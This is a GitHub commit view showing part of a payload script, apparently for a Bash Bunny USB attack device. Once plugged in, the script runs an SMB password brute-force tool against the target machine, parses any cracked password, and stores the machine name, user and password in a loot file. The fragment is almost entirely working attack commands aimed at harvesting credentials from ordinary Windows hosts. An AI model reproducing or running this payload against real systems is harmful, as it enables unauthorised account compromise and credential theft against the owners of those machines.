Update payload.txt

pull/383/head
Mohamed A. Baset 2019-05-30 00:55:17 -05:00 committed by GitHub
parent d9d741e828
commit b3537e7a65
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 3 additions and 0 deletions

View File

@ -16,13 +16,16 @@ ATTACKMODE HID RNDIS_ETHERNET
mount /dev/nandf /root/udisk/
GET TARGET_IP
GET TARGET_HOSTNAME
# Perform SMB bruteforce attack
LED STAGE1
python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file
# Check for results
LED STAGE2
if grep -q "Success" $password_process_file; then
LED G
# Extract and Store the loot, then quack it
pass=$(cat $password_process_file | grep "./" | cut -d "/" -f 2 | cut -d ":" -f 2)
echo "Machine: $TARGET_HOSTNAME - User: $user - Pass: $pass" >> $password_loot_file